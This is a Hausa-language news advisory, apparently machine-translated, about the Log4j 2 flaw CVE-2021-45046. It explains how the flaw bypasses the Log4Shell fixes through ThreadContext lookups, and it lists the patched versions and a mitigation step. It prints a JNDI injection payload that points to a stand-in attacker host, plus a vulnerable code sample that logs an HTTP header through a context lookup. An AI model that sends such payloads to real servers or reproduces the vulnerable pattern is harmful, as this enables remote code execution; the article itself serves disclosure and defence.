An gano wani rauni a cikin aiwatar da maye gurbin JNDI a cikin ɗakin karatu na Log4j 2 (CVE-2021-45046), wanda ke faruwa duk da gyare-gyaren da aka ƙara a cikin sakin 2.15 kuma ba tare da la'akari da amfani da saitin "log4j2.noFormatMsgLookup" don kariya ba. Matsalar tana da haɗari musamman ga tsofaffin nau'ikan Log4j 2, an kiyaye su ta amfani da tutar "noFormatMsgLookup", saboda yana ba ku damar ketare kariya daga raunin da ya gabata (Log4Shell, CVE-2021-44228), wanda ke ba ku damar aiwatar da lambar ku akan ta. uwar garken. Ga masu amfani da sigar 2.15, amfani yana iyakance ga ƙirƙirar yanayi don aikace-aikacen ya faɗo saboda gajiyar da ake samu.
Rashin lahani yana faruwa ne kawai akan tsarin da ke amfani da Binciken Yanayin kamar ${ctx:loginId} ko Taswirorin Ma'anar Magana kamar %X, %mdc, da %MDC don shiga. Aiki ya zo ƙasa don ƙirƙirar yanayi don fitar da bayanan da ke ɗauke da maye gurbin JNDI zuwa log ɗin lokacin amfani da tambayoyin mahallin ko samfuran MDC a cikin aikace-aikacen da ke ayyana ƙa'idodin tsara fitarwa zuwa log ɗin.
Masu bincike daga LunaSec sun lura cewa don nau'ikan Log4j kasa da 2.15, ana iya amfani da wannan raunin azaman sabon vector don harin Log4Shell wanda ke haifar da aiwatar da code idan ana amfani da maganganun ThreadContext lokacin fitarwa zuwa log ɗin, wanda bayanan waje ke shiga, ba tare da la'akari da shi ba. hadawa don kare tuta " noMsgFormatLookups" ko samfuri "%m{nolookups}".
Keɓancewar kariyar ta zo ne ga gaskiyar cewa maimakon maye gurbin kai tsaye "${jndi:ldap://attacker.com/a}", ana musanya wannan furci ta hanyar ƙimar matsakaicin matsakaicin da aka yi amfani da shi a cikin ƙa'idodi don tsara fitarwa zuwa ga log. Misali, idan an yi amfani da tambayar mahallin ${ctx:apiversion} lokacin fitar da log ɗin, to ana iya kai harin ta hanyar musanya bayanan "${jndi:ldap://attacker.com/a}" a cikin ƙimar da aka rubuta zuwa madaidaicin ƙima. Misalin lamba mai rauni: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") fihirisar jama'a na kirtani(@RequestHeader("X-Api-Version") apiVersion) {// An wuce ƙimar taken "X-Api-Version" HTTP zuwa ThreadContext ThreadContext.put("apiversion" , apiVersion ); // Lokacin fitarwa zuwa log ɗin, ƙimar waje na apiversion za a sarrafa ta amfani da maye gurbin ${ctx:apiversion} logger.info("An karɓi buƙatun don sigar API"); dawo "Sannu, duniya!"; }
A cikin Log4j 2.15, ana iya amfani da raunin don aiwatar da hare-haren DoS lokacin da aka ba da ƙima zuwa ga Tsarin Tsarin da zai haifar da tsarin tsarin fitarwa zuwa madauki.
An buga sabuntawa 2.16 da 2.12.2 don toshe raunin. A cikin Log4j 2.16 reshen, ban da gyare-gyaren da aka aiwatar a cikin sigar 2.15 da ɗaure tambayoyin JNDI LDAP zuwa "localhost", aikin JNDI gaba ɗaya ya lalace ta hanyar tsoho kuma an cire goyan bayan tsarin maye gurbin saƙo. A matsayin tsarin tsaro, ana ba da shawarar cire ajin JndiLookup daga hanyar aji (misali "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").
Kuna iya bin diddigin bayyanar gyare-gyare a cikin fakiti akan shafukan rarraba (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) da masana'antun dandamali na Java (GitHub, Docker, Oracle, vmWare, Broadcom da Amazon / AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, da sauransu).
source: budenet.ru